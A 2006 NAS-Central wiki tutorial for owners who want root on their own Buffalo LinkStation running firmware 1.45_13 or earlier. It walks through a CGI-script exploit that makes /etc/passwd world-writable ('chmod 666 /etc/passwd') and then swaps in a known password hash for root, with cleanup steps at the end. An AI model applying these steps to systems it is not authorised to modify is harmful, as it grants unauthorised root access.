CGI Exploit (PowerPC) original method of Hacking the LinkStation

From NAS-Central Buffalo - The Linkstation Wiki
Revision as of 00:36, 26 June 2006 by Ramuk (Talk | contribs)

Jump to: navigation, search

1. This method applies only to version 1.45_13 and previous firmwares! The hack works by exploiting a security vulnerability in the stock LinkStation web server. Basically you will create a script which, on execution, will change the permissions of the system password file, thus allowing you to replace the stock root password (which we don't know) with the password for the user account you previously created (and which we do know). Start by connecting to the LinkStation via telnet.

2. Enter the username and password you previously created. You should now be at the command prompt.

3. First we need to create a directory from which to launch the CGI exploit. Use the command:

mkdir /www/cgi-bin3; cd /www/cgi-bin3

4. Now we need to create a script to change the permissions for /etc/passwd (the system password file). Use the command:

vi exploit.cgi

5. Press i for interactive mode and enter the following:

#!/bin/sh
chmod 666 /etc/passwd

6. Save the file by pressing the escape key and entering:

:wq

7. Press enter and the file should be saved in /www/cgi-bin3/ as exploit.cgi. Next make the file executable by using the command:

chmod +x exploit.cgi

8. Execute the file by launching your web browser and entering the URL:

http://linkstation.ip.address/cgi-bin3/exploit.cgi

9. /etc/passwd should now be readable/writeable. Let's backup the password file before we mess with it:

cp /etc/passwd /etc/passwd-bak

10. Open up the password file so we can change the root password to one we know:

vi /etc/passwd

11. The root password is stored in an encrypted format. /etc/passwd should look something like:

root:asdfngskmnf.4:0:0:root:/root:/bin/bash
youruseraccount:nvgdkfj5f.5sdf:100:1000:/home:/bin/bash

12. The root password is contained between the two colons after root. In this example it would be asdfngskmnf.4. The youruseraccount password would be nvgdkfj5f.5sdf. You can delete the root password by moving the cursor to the beginning of the password and typing dw to delete the entire word. Then press i to enter interactive mode and type in the youruseraccount password.

13. Let's try to become root. While keeping your existing telnet session open, start a new telnet session and attempt to log in as root. If you fail to log in as root, double-check that you edited /etc/passwd correctly. If you have any problems or somehow messed up the password file simply copy over the password backup using the command:

cp /etc/passwd-bak /etc/passwd

14. Finally we need to secure the LinkStation by removing the exploit script, correcting the /etc/passwd permissions, and deleting the backup password file. Use the commands:

rm /www/cgi-bin3/exploit.cgi; chmod 644 /etc/passwd; rm /etc/passwd-bak

15. Congratulations, you have successfully hacked your LinkStation!